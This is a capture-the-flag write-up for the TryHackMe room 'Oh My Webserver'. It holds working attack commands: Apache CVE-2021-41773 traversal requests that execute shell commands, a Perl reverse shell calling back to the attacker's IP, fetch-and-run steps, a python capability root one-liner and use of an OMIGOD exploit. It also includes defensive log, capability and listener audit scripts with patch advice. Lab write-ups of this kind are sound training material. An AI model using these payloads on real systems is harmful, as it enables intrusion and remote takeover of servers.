# TryHackMe : Oh My Webserver WriteUp

This is my writeup for the [Oh My Webserver](https://tryhackme.com/room/ohmyweb) room/machine of the [TryHackMe.com platform](https://tryhackme.com). Remember this is just how I solved/owned the machine; maybe there are different and faster paths but...

## Machine

*Can you root me?*

The machine is rated as a medium machine and if you're looking for a good machine...go for it.

Thanks a lot to [tinyb0y](https://tryhackme.com/p/tinyb0y) for this machine! Thanks a lot also to the great [cyberaguiar](https://tryhackme.com/p/cyberaguiar), he helped me to reach the proper vector (after the first unintended way to exploit the machine)!

If you want to discuss or if you have any problem just send me a message on Discord (user kraba#4968).

The techniques used in this machine, after a small enumeration:

* [Apache 2.4.49 CVE-2021-41773](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773)
* Linux capabilities on Python
* [MS OMI Agent CVE-2021-38647 OMIGOD](https://www.tenable.com/blog/cve-2021-38647-omigod-critical-flaw-leaves-azure-linux-vms-vulnerable-to-remote-code-execution)

## Recon

Point 0: my IP for the server was 10.10.10.133; when you read it...just change it with yours.

First of all I run a classic nmap scan:

```bash
nmap -sC -sV -p- 10.10.10.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-05 11:51 GMT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 16.59% done; ETC: 11:53 (0:02:06 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 74.53% done; ETC: 11:53 (0:00:30 remaining)
Nmap scan report for 10.10.10.133
Host is up (0.032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.49 (Unix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

I'm looking at a Linux machine with two open ports: 22 and 80. When I browse port 80 I reach just the default Apache home page:

```bash
curl http://10.10.10.133

It works!

```

I ran several gobuster, dirb, ffuf, wfuzz scans...nothing, there is nothing! But wait, I checked the Apache version...it sounds familiar: 2.4.49, oh, the [CVE-2021-41773](https://www.itsfoss.net/vulnerability-in-apache-http-server/)!

## Foothold

You may find other working exploits, but what we need here is just cURL. According to the [mr-exo GitHub page](https://github.com/mr-exo/CVE-2021-41773) I can just run:

```bash
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
```

Let's try it:

```bash
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami'
daemon
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
```

It's working! Let's upload a shell and gain access. I use a Perl one because, after a few checks, it's a Docker image and I don't know how much software is installed:

```bash
vi shell.sh
perl -e 'use Socket;$i="10.11.55.171";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

and I run 3 cURL requests:

```bash
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;curl http://10.11.55.171/shell.sh -o /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;chmod +x /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;sh /tmp/shell.sh'
```

and my netcat listener has a connection:

```bash
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 36344
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@f1984047b638:/$ 
```

## PE to root on docker

I used linpeas.sh as usual (I'm lazy on Saturday) and I found a super fast PE to root inside the Docker image:

```bash
Files with capabilities (limited to 50):
/usr/bin/python3.7 = cap_setuid+ep
```

As usual on [gtfobins](https://gtfobins.github.io/gtfobins/python/#capabilities) there is a way to use it:

```
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1(daemon) groups=1(daemon)
# cd /root
cd /root
# ls -ltra
ls -ltra
total 28
-rw-r--r-- 1 root root    570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root    148 Aug 17  2015 .profile
drwxr-xr-x 3 root root   4096 Oct  8 05:37 .cache
lrwxrwxrwx 1 root root      9 Oct  8 05:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root     38 Oct  8 05:47 user.txt
drwxr-xr-x 1 root root   4096 Oct  8 08:22 ..
-rw------- 1 root daemon   12 Oct  8 08:28 .python_history
drwx------ 1 root root   4096 Oct  8 08:28 .
# cat user.txt
cat user.txt
THM{REDACTED}
```

Well! First flag done!

## PE to root

After further research, checks, enumeration and so on...nothing was "pretty clear". I'm inside a Docker image, and every possible way to escalate/break out that I know was checked...no way! Thanks to cyberaguiar I found the way.
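Looking back at the foothold: the request that gave the `daemon` shell leaves a distinctive trace in the Apache access log, because the `..` only appears after the percent-encoding is decoded twice (`.%%32%65` becomes `.%2e`, then `..`). The scanner below is an added example for this writeup, not the room's code and not from the exploit repositories linked above; its log lines are constructed to mirror the requests shown, and the log format regex, the field names and the `cgi_rce` label are my own choices.

```python
"""Spot CVE-2021-41773-style path traversal in Apache access logs.

Added example for this writeup, not code from the room or from the exploit
repositories it links. The log lines are constructed to mirror the requests
shown above; nothing here comes from a real server.
"""
import re
from urllib.parse import unquote

# Apache common/combined log format: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: a double-encoded traversal into cgi-bin (the writeup's
# request), a single-encoded file read, a literal '..' that Apache itself
# normalizes away, and two harmless requests (one with a decoy '%2e').
SAMPLE_LOG = [
    '10.11.55.171 - - [05/Mar/2022:11:58:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 42 "-" "curl/7.81.0"',
    '192.0.2.7 - - [05/Mar/2022:12:01:17 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1305 "-" "curl/7.81.0"',
    '198.51.100.3 - - [05/Mar/2022:12:02:40 +0000] "GET /icons/../index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '10.11.55.171 - - [05/Mar/2022:11:55:10 +0000] "GET / HTTP/1.1" 200 45 "-" "curl/7.81.0"',
    '203.0.113.9 - - [05/Mar/2022:12:03:05 +0000] "GET /.%2ehidden?x=1 HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]


def normalize_path(target, max_rounds=3):
    """Percent-decode the path until it stops changing (bounded).

    One round turns '.%%32%65' into '.%2e'; a second turns it into '..'.
    Apache 2.4.49 performed that second decode after its traversal check,
    so a log scanner has to repeat the decode to see what the server saw.
    """
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def traversal_kind(raw_path, norm_path):
    """'encoded-traversal' if '..' appears only after decoding,
    'plain-traversal' if it was literal in the request, else None."""
    raw_dotdot = ".." in raw_path.split("/")
    norm_dotdot = ".." in norm_path.split("/")
    if norm_dotdot and not raw_dotdot:
        return "encoded-traversal"
    if raw_dotdot:
        return "plain-traversal"
    return None


def scan(lines):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path = m["target"].split("?", 1)[0]
        norm = normalize_path(m["target"])
        kind = traversal_kind(raw_path, norm)
        if kind is None:
            continue
        findings.append({
            "ip": m["ip"],
            "method": m["method"],
            "target": m["target"],
            "normalized": norm,
            "kind": kind,
            # Encoded traversal into a CGI-enabled path with a request body is
            # the command-execution variant seen above, not just a file read.
            "cgi_rce": kind == "encoded-traversal"
            and norm.startswith("/cgi-bin/")
            and m["method"] == "POST",
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['kind']:18} cgi_rce={f['cgi_rce']!s:5} {f['ip']} {f['method']} {f['target']}")
```

The literal `/icons/../index.html` case is reported separately on purpose: Apache collapses a plain `..` before routing, so it is noise rather than this bug. On the fix side, 2.4.50 only partially closed the hole (CVE-2021-42013); 2.4.51 is the version that closes both, and keeping `Require all denied` on `<Directory />` plus leaving mod_cgi disabled unless needed limits what a traversal can reach.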
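The `cap_setuid` on `/usr/bin/python3.7` that linpeas reported is something a defender can catch long before it becomes a one-liner to root. The audit below is an added example, not part of the room, linpeas or gtfobins; `SAMPLE_GETCAP` is constructed (only its first line mirrors the linpeas output above, the rest are invented entries covering the other output format), and the `ROOT_EQUIVALENT` and `INTERPRETERS` lists are my own selection.

```python
"""Audit file capabilities the way a defender reads getcap/linpeas output.

Added example for this writeup; not part of the room, linpeas or gtfobins.
SAMPLE_GETCAP is constructed: its first line mirrors the linpeas finding
above, the others are invented to exercise both getcap output formats.
"""
import re
import sys

# Capabilities that let a process become root or bypass file permissions.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}
# Binaries that run arbitrary code for whoever can execute them: a dangerous
# capability here is effectively a root shell for every local user.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "lua", "tclsh")

CAP_RE = re.compile(r"cap_[a-z_]+")

# Older libcap prints 'path = caps'; newer libcap (2.41+) prints 'path caps'.
SAMPLE_GETCAP = """\
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl cap_setuid,cap_setgid=ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
"""


def parse_getcap(text):
    """Return [(path, [cap, ...]), ...], accepting both getcap output formats."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or "cap_" not in line:
            continue
        if " = " in line:                 # legacy: /path = cap_x+ep
            path, caps = line.rsplit(" = ", 1)
        else:                             # libcap >= 2.41: /path cap_x=ep
            path, caps = line.rsplit(" ", 1)
        entries.append((path, CAP_RE.findall(caps)))
    return entries


def audit(entries):
    """Keep only binaries carrying a root-equivalent capability and say
    whether the binary is an interpreter (worst case)."""
    findings = []
    for path, caps in entries:
        dangerous = sorted(set(caps) & ROOT_EQUIVALENT)
        if not dangerous:
            continue
        name = path.rsplit("/", 1)[-1]
        findings.append({
            "path": path,
            "dangerous": dangerous,
            "interpreter": name.startswith(INTERPRETERS),
        })
    return findings


if __name__ == "__main__":
    # Pipe real output in: getcap -r / 2>/dev/null | python3 capaudit.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for f in audit(parse_getcap(text)):
        tag = "INTERPRETER" if f["interpreter"] else "binary"
        print(f"{f['path']}: {','.join(f['dangerous'])} ({tag})")
```

For a container the cleaner fix is not to rely on file-level hygiene at all: start it with `--cap-drop=ALL` plus only the capabilities it needs, and with `--security-opt=no-new-privileges`, which stops `execve` from raising privileges through file capabilities (or setuid bits) in the first place.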
I'm inside Docker, and nothing seems to be running except port 80:

```bash
root@4a70924bafa0:/tmp# netstat -tulpn
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
```

and my IP is 172.17.0.2:

```bash
root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 4861  bytes 6267674 (5.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 133875  bytes 9894711 (9.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

Why not check the host IP 172.17.0.1 (the one running Docker)? Nmap is not installed, so I grabbed it from [the andrew-d GitHub page](https://github.com/andrew-d/static-binaries) (or better, [here](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap)) and I ran it:

```bash
root@4a70924bafa0:/bin# cd /tmp
root@4a70924bafa0:/tmp# curl 10.11.55.171/nmap -o nmap
root@4a70924bafa0:/tmp# chmod +x nmap
root@4a70924bafa0:/tmp# ./nmap -sT -p- 172.17.0.1
Host is up (0.0044s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
MAC Address: 02:42:19:6E:E8:C1 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds
```

Ummm, interesting! Port 5986 is open, and only locally (the first nmap was showing only 22 and 80). Let's check what this port is used for on [hacktricks](https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-omi):

*OMI is an open-source remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers...*

Ah! Good! This machine is a "replica" of an Azure Linux server running Docker and a service called OMI agent. At the end of the page there is some useful info: [there is a CVE](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647). Other useful links are [this one](https://www.pwndefend.com/2021/09/17/cve-2021-38647-open-management-infrastructure-omi-rce-azure-linux-hosts/) and [this one](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/). Let's look for an exploit on GitHub: there are two options, the [horizon3ai one](https://github.com/horizon3ai/CVE-2021-38647) and the [AlteredSecurity one](https://github.com/AlteredSecurity/CVE-2021-38647). The two exploits are pretty much the same, or at least do the same stuff...I chose the second one and saved the .py onto my box. I try to run it:

```bash
root@4a70924bafa0:/tmp# curl 10.11.55.171/exploit.py -o exp.py
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "whoami"
root
```

And it's working. Let's grab the flag and run a reverse shell (the same one used at the beginning):

```bash
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "cat /root/root.txt"
THM{REDACTED}
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "curl http://10.11.55.171/shell.sh -o /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "chmod +x /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "sh /tmp/shell.sh"
```

and my listener:

```bash
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 51410
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cd /root
# ls -ltra
total 56
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwxr-xr-x 20 root root  4096 Sep 30 05:05 ..
drwx------  2 root root  4096 Sep 30 05:19 .ssh
drwxr-xr-x  3 root root  4096 Sep 30 05:20 snap
-rw-------  1 root root  1024 Sep 30 05:53 .rnd
-rw-r--r--  1 root root   277 Oct  8 04:33 .wget-hsts
-rw-------  1 root root 12125 Oct  8 05:05 .viminfo
-rw-r--r--  1 root root    38 Oct  8 05:48 root.txt
-rw-------  1 root root   169 Oct  8 08:24 .bash_history
drwxr-xr-x  3 root root  4096 Feb 23 05:20 .local
drwx------  5 root root  4096 Feb 23 05:20 .
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:42245         0.0.0.0:*               LISTEN      678/containerd      
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1161/docker-proxy   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      624/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      751/sshd: /usr/sbin 
tcp6       0      0 :::80                   :::*                    LISTEN      1173/docker-proxy   
tcp6       0      0 :::22                   :::*                    LISTEN      751/sshd: /usr/sbin 
tcp6       0      0 :::5986                 :::*                    LISTEN      941/omiengine       
udp        0      0 127.0.0.53:53           0.0.0.0:*                           624/systemd-resolve 
udp        0      0 10.10.191.31:68         0.0.0.0:*                           621/systemd-network 
```

Machine done!
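The host's `netstat -tulpn` explains why 5986 was invisible from outside yet reachable from the container: `omiengine` is bound to `:::5986`, that is every interface including the Docker bridge, while the external scan counted it among the filtered ports. A defender reviewing a host can classify each listener by bind scope and flag what any container on the bridge can reach. The script below is an added example, not part of the room; `SAMPLE_NETSTAT` is constructed to mirror the listing above, the bridge range 172.17.0.0/16 is the Docker default I'm assuming, and the `OMI_PORTS` set and `omi` flag are my own naming.

```python
"""Classify `netstat -tulpn` listeners and flag those a container on the
Docker bridge can reach.

Added example for this writeup, not part of the room. SAMPLE_NETSTAT is
constructed to mirror the host listing above; 172.17.0.0/16 as the bridge
range is the Docker default assumed here.
"""
import ipaddress

OMI_PORTS = {5985, 5986}   # OMI management listeners (CVE-2021-38647 surface)

SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:42245         0.0.0.0:*               LISTEN      678/containerd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1161/docker-proxy
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      624/systemd-resolve
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      751/sshd: /usr/sbin
tcp6       0      0 :::80                   :::*                    LISTEN      1173/docker-proxy
tcp6       0      0 :::22                   :::*                    LISTEN      751/sshd: /usr/sbin
tcp6       0      0 :::5986                 :::*                    LISTEN      941/omiengine
udp        0      0 127.0.0.53:53           0.0.0.0:*                           624/systemd-resolve
udp        0      0 10.10.191.31:68         0.0.0.0:*                           621/systemd-network
"""


def bind_scope(host):
    """'wildcard' (all interfaces, bridge included), 'loopback' or 'specific'."""
    if host in ("0.0.0.0", "::"):
        return "wildcard"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"
    return "loopback" if ip.is_loopback else "specific"


def parse_netstat(text):
    """One dict per socket row; header and title lines are skipped."""
    entries = []
    for line in text.splitlines():
        proto = line.split(None, 1)[0] if line.strip() else ""
        if not proto.startswith(("tcp", "udp")):
            continue
        # tcp rows carry a State column, udp rows do not; the program field
        # may itself contain spaces ("sshd: /usr/sbin"), hence the maxsplit.
        if proto.startswith("tcp"):
            _, _, _, local, _, state, pidprog = line.split(None, 6)
        else:
            _, _, _, local, _, pidprog = line.split(None, 5)
            state = ""
        host, _, port = local.rpartition(":")
        program = pidprog.split("/", 1)[1].split()[0].rstrip(":") if "/" in pidprog else None
        entries.append({
            "proto": proto, "host": host, "port": int(port),
            "scope": bind_scope(host), "state": state, "program": program,
        })
    return entries


def bridge_exposed(entries):
    """Sockets bound to every interface: reachable from 172.17.0.0/16 even
    when a perimeter firewall hides them from an external scan."""
    out = []
    for e in entries:
        if e["scope"] != "wildcard":
            continue
        if e["proto"].startswith("tcp") and e["state"] != "LISTEN":
            continue
        out.append(dict(e, omi=e["port"] in OMI_PORTS or e["program"] == "omiengine"))
    return out


if __name__ == "__main__":
    for e in bridge_exposed(parse_netstat(SAMPLE_NETSTAT)):
        flag = "  <-- OMI, patch to 1.6.8.1+ or firewall docker0" if e["omi"] else ""
        print(f"{e['proto']:5} {e['host']}:{e['port']} {e['program']}{flag}")
```

Only `docker-proxy` on port 80 was meant to be reachable from the container side; `sshd` and `omiengine` are there because they bind the wildcard address. For OMI the fix is the patched agent (1.6.8.1 or later), and in the meantime an `iptables` INPUT rule dropping traffic from `docker0` to 5985/5986 removes the bridge path the writeup used.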